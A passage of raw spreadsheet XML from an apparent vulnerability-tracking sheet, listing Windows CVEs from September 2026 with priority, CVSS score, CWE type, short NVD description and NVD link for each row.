/><c r="H1404" s="5" t="n"><v>0.002</v></c><c r="I1404" s="5" t="inlineStr" /><c r="J1404" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K140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04" s="5" t="inlineStr" /><c r="M1404" s="5" t="inlineStr" /><c r="N1404" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1404" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1404" s="5" t="inlineStr" /><c r="Q1404" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1404" s="5" t="inlineStr"><is><t>Use after free in Windows NTFS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1404" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69567</t></is></c></row><row r="1405"><c r="A1405" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1405" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1405" s="5" t="inlineStr"><is><t>CVE-2026-69573</t></is></c><c r="D1405" s="5" t="n"><v>7</v></c><c r="E1405" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1405" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1405" s="5" t="inlineStr" /><c r="H1405" s="5" t="n"><v>0.003</v></c><c r="I1405" s="5" t="inlineStr" /><c r="J1405" s="5" t="inlineStr" /><c r="K1405" s="5" t="inlineStr" /><c r="L1405" s="5" t="inlineStr" /><c r="M1405" s="5" t="inlineStr" /><c r="N1405" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1405" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1405" s="5" t="inlineStr" /><c r="Q1405" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1405" s="5" t="inlineStr"><is><t>Use after free in Windows Universal Disk Format File System Driver (UDFS) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1405" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69573</t></is></c></row><row r="1406"><c r="A1406" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1406" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1406" s="5" t="inlineStr"><is><t>CVE-2026-69574</t></is></c><c r="D1406" s="5" t="n"><v>7</v></c><c r="E1406" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1406" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1406" s="5" t="inlineStr" /><c r="H1406" s="5" t="n"><v>0.003</v></c><c r="I1406" s="5" t="inlineStr" /><c r="J1406" s="5" t="inlineStr" /><c r="K1406" s="5" t="inlineStr" /><c r="L1406" s="5" t="inlineStr" /><c r="M1406" s="5" t="inlineStr" /><c r="N1406" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1406" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1406" s="5" t="inlineStr" /><c r="Q1406" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1406" s="5" t="inlineStr"><is><t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1406" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69574</t></is></c></row><row r="1407"><c r="A1407" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1407" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1407" s="5" t="inlineStr"><is><t>CVE-2026-69575</t></is></c><c r="D1407" s="5" t="n"><v>7</v></c><c r="E1407" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1407" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1407" s="5" t="inlineStr" /><c r="H1407" s="5" t="n"><v>0.003</v></c><c r="I1407" s="5" t="inlineStr" /><c r="J1407" s="5" t="inlineStr" /><c r="K1407" s="5" t="inlineStr" /><c r="L1407" s="5" t="inlineStr" /><c r="M1407" s="5" t="inlineStr" /><c r="N1407" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1407" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1407" s="5" t="inlineStr" /><c r="Q1407" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1407" s="5" t="inlineStr"><is><t>Use after free in Windows Storage Spaces Controller allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1407" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69575</t></is></c></row><row r="1408"><c r="A1408" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1408" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1408" s="5" t="inlineStr"><is><t>CVE-2026-69578</t></is></c><c r="D1408" s="5" t="n"><v>7</v></c><c r="E1408" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1408" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1408" s="5" t="inlineStr" /><c r="H1408" s="5" t="n"><v>0.002</v></c><c r="I1408" s="5" t="inlineStr" /><c r="J1408" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K140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08" s="5" t="inlineStr" /><c r="M1408" s="5" t="inlineStr" /><c r="N1408" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1408" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1408" s="5" t="inlineStr" /><c r="Q1408" s="5" t="inlineStr"><is><t>CWE-122, CWE-197</t></is></c><c r="R1408" s="5" t="inlineStr"><is><t>Numeric truncation error in Windows Kernel allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1408" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69578</t></is></c></row><row r="1409"><c r="A1409" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1409" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1409" s="5" t="inlineStr"><is><t>CVE-2026-69581</t></is></c><c r="D1409" s="5" t="n"><v>7</v></c><c r="E1409" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1409" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1409" s="5" t="inlineStr" /><c r="H1409" s="5" t="n"><v>0.002</v></c><c r="I1409" s="5" t="inlineStr" /><c r="J1409" s="5" t="inlineStr" /><c r="K1409" s="5" t="inlineStr" /><c r="L1409" s="5" t="inlineStr" /><c r="M1409" s="5" t="inlineStr" /><c r="N1409" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1409" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1409" s="5" t="inlineStr" /><c r="Q1409" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="R1409" s="5" t="inlineStr"><is><t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1409" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69581</t></is></c></row><row r="1410"><c r="A1410" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1410" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1410" s="5" t="inlineStr"><is><t>CVE-2026-69600</t></is></c><c r="D1410" s="5" t="n"><v>7</v></c><c r="E1410" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1410" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1410" s="5" t="inlineStr" /><c r="H1410" s="5" t="n"><v>0.003</v></c><c r="I1410" s="5" t="inlineStr" /><c r="J1410" s="5" t="inlineStr" /><c r="K1410" s="5" t="inlineStr" /><c r="L1410" s="5" t="inlineStr" /><c r="M1410" s="5" t="inlineStr" /><c r="N1410" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1410" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1410" s="5" t="inlineStr" /><c r="Q1410" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1410" s="5" t="inlineStr"><is><t>Use after free in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1410" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69600</t></is></c></row><row r="1411"><c r="A1411" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1411" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1411" s="5" t="inlineStr"><is><t>CVE-2026-69605</t></is></c><c r="D1411" s="5" t="n"><v>7</v></c><c r="E1411" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1411" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1411" s="5" t="inlineStr" /><c r="H1411" s="5" t="n"><v>0.003</v></c><c r="I1411" s="5" t="inlineStr" /><c r="J1411" s="5" t="inlineStr" /><c r="K1411" s="5" t="inlineStr" /><c r="L1411" s="5" t="inlineStr" /><c r="M1411" s="5" t="inlineStr" /><c r="N1411" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1411" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1411" s="5" t="inlineStr" /><c r="Q1411" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1411" s="5" t="inlineStr"><is><t>Use after free in Microsoft Install Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1411" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69605</t></is></c></row><row r="1412"><c r="A1412" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1412" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1412" s="5" t="inlineStr"><is><t>CVE-2026-69606</t></is></c><c r="D1412" s="5" t="n"><v>7</v></c><c r="E1412" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1412" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1412" s="5" t="inlineStr" /><c r="H1412" s="5" t="n"><v>0.003</v></c><c r="I1412" s="5" t="inlineStr" /><c r="J1412" s="5" t="inlineStr" /><c r="K1412" s="5" t="inlineStr" /><c r="L1412" s="5" t="inlineStr" /><c r="M1412" s="5" t="inlineStr" /><c r="N1412" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1412" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1412" s="5" t="inlineStr" /><c r="Q1412" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1412" s="5" t="inlineStr"><is><t>Use after free in Windows Shell allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1412" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69606</t></is></c></row><row r="1413"><c r="A1413" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1413" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1413" s="5" t="inlineStr"><is><t>CVE-2026-69610</t></is></c><c r="D1413" s="5" t="n"><v>7</v></c><c r="E1413" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1413" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1413" s="5" t="inlineStr" /><c r="H1413" s="5" t="n"><v>0.003</v></c><c r="I1413" s="5" t="inlineStr" /><c r="J1413" s="5" t="inlineStr" /><c r="K1413" s="5" t="inlineStr" /><c r="L1413" s="5" t="inlineStr" /><c r="M1413" s="5" t="inlineStr" /><c r="N1413" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1413" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1413" s="5" t="inlineStr" /><c r="Q1413" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="R1413" s="5" t="inlineStr"><is><t>Buffer over-read in Windows Win32K allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1413" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69610</t></is></c></row><row r="1414"><c r="A1414" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1414" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1414" s="5" t="inlineStr"><is><t>CVE-2026-69611</t></is></c><c r="D1414" s="5" t="n"><v>7</v></c><c r="E1414" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1414" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1414" s="5" t="inlineStr" /><c r="H1414" s="5" t="n"><v>0.003</v></c><c r="I1414" s="5" t="inlineStr" /><c r="J1414" s="5" t="inlineStr" /><c r="K1414" s="5" t="inlineStr" /><c r="L1414" s="5" t="inlineStr" /><c r="M1414" s="5" t="inlineStr" /><c r="N1414" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1414" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1414" s="5" t="inlineStr" /><c r="Q1414" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1414" s="5" t="inlineStr"><is><t>Use after free in Virtual Hard Disk (VHD) Miniport Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1414" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69611</t></is></c></row><row r="1415"><c r="A1415" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1415" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1415" s="5" t="inlineStr"><is><t>CVE-2026-69613</t></is></c><c r="D1415" s="5" t="n"><v>7</v></c><c r="E1415" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1415" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1415" s="5" t="inlineStr" /><c r="H1415" s="5" t="n"><v>0.003</v></c><c r="I1415" s="5" t="inlineStr" /><c r="J1415" s="5" t="inlineStr" /><c r="K1415" s="5" t="inlineStr" /><c r="L1415" s="5" t="inlineStr" /><c r="M1415" s="5" t="inlineStr" /><c r="N1415" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1415" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1415" s="5" t="inlineStr" /><c r="Q1415" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1415" s="5" t="inlineStr"><is><t>Use after free in Windows Image Acquisition allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1415" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69613</t></is></c></row><row r="1416"><c r="A1416" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1416" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1416" s="5" t="inlineStr"><is><t>CVE-2026-69617</t></is></c><c r="D1416" s="5" t="n"><v>7</v></c><c r="E1416" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1416" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1416" s="5" t="inlineStr" /><c r="H1416" s="5" t="n"><v>0.003</v></c><c r="I1416" s="5" t="inlineStr" /><c r="J1416" s="5" t="inlineStr" /><c r="K1416" s="5" t="inlineStr" /><c r="L1416" s="5" t="inlineStr" /><c r="M1416" s="5" t="inlineStr" /><c r="N1416" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1416" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1416" s="5" t="inlineStr" /><c r="Q1416" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1416" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Resilient File System (ReFS) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1416" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69617</t></is></c></row><row r="1417"><c r="A1417" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1417" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1417" s="5" t="inlineStr"><is><t>CVE-2026-69621</t></is></c><c r="D1417" s="5" t="n"><v>7</v></c><c r="E1417" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1417" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1417" s="5" t="inlineStr" /><c r="H1417" s="5" t="n"><v>0.003</v></c><c r="I1417" s="5" t="inlineStr" /><c r="J1417" s="5" t="inlineStr" /><c r="K1417" s="5" t="inlineStr" /><c r="L1417" s="5" t="inlineStr" /><c r="M1417" s="5" t="inlineStr" /><c r="N1417" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1417" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1417" s="5" t="inlineStr" /><c r="Q1417" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1417" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Fax Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1417" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69621</t></is></c></row><row r="1418"><c r="A1418" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1418" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1418" s="5" t="inlineStr"><is><t>CVE-2026-69630</t></is></c><c r="D1418" s="5" t="n"><v>7</v></c><c r="E1418" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1418" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1418" s="5" t="inlineStr" /><c r="H1418" s="5" t="n"><v>0.003</v></c><c r="I1418" s="5" t="inlineStr" /><c r="J1418" s="5" t="inlineStr" /><c r="K1418" s="5" t="inlineStr" /><c r="L1418" s="5" t="inlineStr" /><c r="M1418" s="5" t="inlineStr" /><c r="N1418" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1418" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1418" s="5" t="inlineStr" /><c r="Q1418" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1418" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Win32K allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1418" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69630</t></is></c></row><row r="1419"><c r="A1419" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1419" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1419" s="5" t="inlineStr"><is><t>CVE-2026-69645</t></is></c><c r="D1419" s="5" t="n"><v>7</v></c><c r="E1419" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1419" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1419" s="5" t="inlineStr" /><c r="H1419" s="5" t="n"><v>0.003</v></c><c r="I1419" s="5" t="inlineStr" /><c r="J1419" s="5" t="inlineStr" /><c r="K1419" s="5" t="inlineStr" /><c r="L1419" s="5" t="inlineStr" /><c r="M1419" s="5" t="inlineStr" /><c r="N1419" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1419" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1419" s="5" t="inlineStr" /><c r="Q1419" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1419" s="5" t="inlineStr"><is><t>Use after free in Windows Message Queuing allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1419" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69645</t></is></c></row><row r="1420"><c r="A1420" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1420" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1420" s="5" t="inlineStr"><is><t>CVE-2026-69648</t></is></c><c r="D1420" s="5" t="n"><v>7</v></c><c r="E1420" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1420" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1420" s="5" t="inlineStr" /><c r="H1420" s="5" t="n"><v>0.003</v></c><c r="I1420" s="5" t="inlineStr" /><c r="J1420" s="5" t="inlineStr" /><c r="K1420" s="5" t="inlineStr" /><c r="L1420" s="5" t="inlineStr" /><c r="M1420" s="5" t="inlineStr" /><c r="N1420" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1420" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1420" s="5" t="inlineStr" /><c r="Q1420" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1420" s="5" t="inlineStr"><is><t>Use after free in Windows Notification allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1420" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69648</t></is></c></row><row r="1421"><c r="A1421" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1421" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1421" s="5" t="inlineStr"><is><t>CVE-2026-69652</t></is></c><c r="D1421" s="5" t="n"><v>7</v></c><c r="E1421" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1421" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1421" s="5" t="inlineStr" /><c r="H1421" s="5" t="n"><v>0.003</v></c><c r="I1421" s="5" t="inlineStr" /><c r="J1421" s="5" t="inlineStr" /><c r="K1421" s="5" t="inlineStr" /><c r="L1421" s="5" t="inlineStr" /><c r="M1421" s="5" t="inlineStr" /><c r="N1421" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1421" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1421" s="5" t="inlineStr" /><c r="Q1421" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1421" s="5" t="inlineStr"><is><t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1421" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69652</t></is></c></row><row r="1422"><c r="A1422" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1422" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1422" s="5" t="inlineStr"><is><t>CVE-2026-69654</t></is></c><c r="D1422" s="5" t="n"><v>7</v></c><c r="E1422" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1422" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1422" s="5" t="inlineStr" /><c r="H1422" s="5" t="n"><v>0.003</v></c><c r="I1422" s="5" t="inlineStr" /><c r="J1422" s="5" t="inlineStr" /><c r="K1422" s="5" t="inlineStr" /><c r="L1422" s="5" t="inlineStr" /><c r="M1422" s="5" t="inlineStr" /><c r="N1422" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1422" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1422" s="5" t="inlineStr" /><c r="Q1422" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1422" s="5" t="inlineStr"><is><t>Use after free in Windows Accounts Control allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1422" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69654</t></is></c></row><row r="1423"><c r="A1423" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1423" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1423" s="5" t="inlineStr"><is><t>CVE-2026-69682</t></is></c><c r="D1423" s="5" t="n"><v>7</v></c><c r="E1423" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1423" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1423" s="5" t="inlineStr" /><c r="H1423" s="5" t="n"><v>0.002</v></c><c r="I1423" s="5" t="inlineStr" /><c r="J1423" s="5" t="inlineStr" /><c r="K1423" s="5" t="inlineStr" /><c r="L1423" s="5" t="inlineStr" /><c r="M1423" s="5" t="inlineStr" /><c r="N1423" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1423" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1423" s="5" t="inlineStr" /><c r="Q1423" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="R1423" s="5" t="inlineStr"><is><t>Use after free in Windows Host Guardian Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1423" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69682</t></is></c></row><row r="1424"><c r="A1424" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1424" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1424" s="5" t="inlineStr"><is><t>CVE-2026-69692</t></is></c><c r="D1424" s="5" t="n"><v>7</v></c><c r="E1424" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1424" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1424" s="5" t="inlineStr" /><c r="H1424" s="5" t="n"><v>0.003</v></c><c r="I1424" s="5" t="inlineStr" /><c r="J1424" s="5" t="inlineStr" /><c r="K1424" s="5" t="inlineStr" /><c r="L1424" s="5" t="inlineStr" /><c r="M1424" s="5" t="inlineStr" /><c r="N1424" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1424" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1424" s="5" t="inlineStr" /><c r="Q1424" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1424" s="5" t="inlineStr"><is><t>Use after free in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1424" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69692</t></is></c></row><row r="1425"><c r="A1425" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1425" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1425" s="5" t="inlineStr"><is><t>CVE-2026-69693</t></is></c><c r="D1425" s="5" t="n"><v>7</v></c><c r="E1425" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1425" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1425" s="5" t="inlineStr" /><c r="H1425" s="5" t="n"><v>0.003</v></c><c r="I1425" s="5" t="inlineStr" /><c r="J1425" s="5" t="inlineStr" /><c r="K1425" s="5" t="inlineStr" /><c r="L1425" s="5" t="inlineStr" /><c r="M1425" s="5" t="inlineStr" /><c r="N1425" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1425" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1425" s="5" t="inlineStr" /><c r="Q1425" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1425" s="5" t="inlineStr"><is><t>Use after free in Windows Device Association Broker service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1425" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69693</t></is></c></row><row r="1426"><c r="A1426" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1426" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1426" s="5" t="inlineStr"><is><t>CVE-2026-69694</t></is></c><c r="D1426" s="5" t="n"><v>7</v></c><c r="E1426" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1426" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1426" s="5" t="inlineStr" /><c r="H1426" s="5" t="n"><v>0.017</v></c><c r="I1426" s="5" t="inlineStr" /><c r="J1426" s="5" t="inlineStr" /><c r="K1426" s="5" t="inlineStr" /><c r="L1426" s="5" t="inlineStr" /><c r="M1426" s="5" t="inlineStr" /><c r="N1426" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1426" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1426" s="5" t="inlineStr" /><c r="Q1426" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="R1426" s="5" t="inlineStr"><is><t>Deserialization of untrusted data in Windows IP Address Management (IPAM) Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1426" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69694</t></is></c></row><row r="1427"><c r="A1427" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1427" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1427" s="5" t="inlineStr"><is><t>CVE-2026-69708</t></is></c><c r="D1427" s="5" t="n"><v>7</v></c><c r="E1427" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1427" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1427" s="5" t="inlineStr" /><c r="H1427" s="5" t="n"><v>0.003</v></c><c r="I1427" s="5" t="inlineStr" /><c r="J1427" s="5" t="inlineStr" /><c r="K1427" s="5" t="inlineStr" /><c r="L1427" s="5" t="inlineStr" /><c r="M1427" s="5" t="inlineStr" /><c r="N1427" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1427" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1427" s="5" t="inlineStr" /><c r="Q1427" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1427" s="5" t="inlineStr"><is><t>Use after free in Windows Web Platform Storage allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1427" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69708</t></is></c></row><row r="1428"><c r="A1428" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1428" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1428" s="5" t="inlineStr"><is><t>CVE-2026-69711</t></is></c><c r="D1428" s="5" t="n"><v>7</v></c><c r="E1428" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1428" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1428" 